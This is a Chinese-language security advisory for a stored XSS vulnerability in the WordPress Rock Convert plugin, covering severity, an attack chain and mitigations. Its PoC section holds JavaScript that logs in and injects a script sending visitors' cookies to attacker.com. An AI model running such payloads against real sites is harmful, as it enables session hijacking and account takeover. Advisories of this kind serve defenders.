CVE-2025-62911: WordPress Rock Convert插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62911

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Rock Content Rock Convert (WordPress插件 <= 3.0.1)

漏洞概述

CVE-2025-62911是WordPress Rock Convert插件中的一个存储型跨站脚本(XSS)漏洞，CVSS评分6.5，属于中危漏洞。该漏洞由Patchstack安全团队发现，存在于插件的Web页面生成过程中，由于对用户输入未进行充分的转义或过滤，攻击者可以注入恶意JavaScript代码。这些恶意代码会被永久存储在数据库中，当其他用户访问包含恶意内容的页面时，浏览器会执行这些脚本，从而窃取会话Cookie、劫持用户账户或进行钓鱼攻击。由于该漏洞需要低权限用户身份且需要用户交互才能触发，攻击复杂度较低，但影响范围仅限于使用该插件的WordPress站点。

技术细节

该漏洞源于Rock Convert插件在处理用户提交内容时，未对特殊字符进行正确的HTML实体转义。攻击者可以在插件的输入字段(如CTA按钮文本、链接标题等)中嵌入恶意脚本，例如<script>alert(document.cookie)</script>。由于插件直接将这些内容存储到数据库并在后续页面渲染时未进行输出转义，导致恶意代码被执行。存储型XSS相比反射型XSS更为危险，因为恶意代码会永久存在于服务器端，所有访问受影响页面的用户都会受到攻击。攻击者可以利用此漏洞窃取管理员会话令牌，进而获得站点后台完全控制权，或者在合法页面中嵌入钓鱼内容。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本及是否安装Rock Convert插件，通过版本探测确定插件版本<=3.0.1

STEP 2

账户获取

攻击者获取目标WordPress站点的低权限账户(如订阅者或贡献者角色)，或通过其他方式获取有效凭证

STEP 3

恶意载荷注入

利用插件功能(如CTA按钮创建、链接插入等)在输入字段中注入包含恶意JavaScript的payload，该内容被存储到数据库

STEP 4

等待触发

当管理员或其他用户访问包含恶意内容的页面时，浏览器解析HTML并执行注入的脚本代码

STEP 5

会话劫持

恶意脚本窃取用户Cookie或会话令牌并发送到攻击者控制的服务器，攻击者利用窃取的凭证劫持账户

STEP 6

权限提升

若窃取的是管理员会话，攻击者可进一步上传恶意插件、修改站点内容或安装后门程序

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-62911 PoC - Stored XSS in Rock Convert Plugin
// Target: WordPress with Rock Convert plugin <= 3.0.1

const payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Step 1: Authenticate with low privilege account
const loginData = {
    log: 'attacker_username',
    pwd: 'attacker_password'
};

fetch('https://target-site.com/wp-login.php', {
    method: 'POST',
    body: new URLSearchParams(loginData),
    credentials: 'include'
}).then(() => {
    // Step 2: Inject XSS payload through plugin's API endpoint
    const xssData = {
        'rock_convert_field': payload,
        'action': 'rock_convert_save'
    };
    
    return fetch('https://target-site.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        body: new URLSearchParams(xssData),
        credentials: 'include'
    });
});

影响范围

Rock Convert <= 3.0.1

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1)临时禁用Rock Convert插件;2)限制低权限用户使用插件相关功能;3)部署Web应用防火墙(WAF)规则过滤<script>标签和事件处理器属性;4)启用浏览器内置的XSS过滤器;5)对管理后台启用双因素认证;6)密切监控站点日志中的异常请求模式。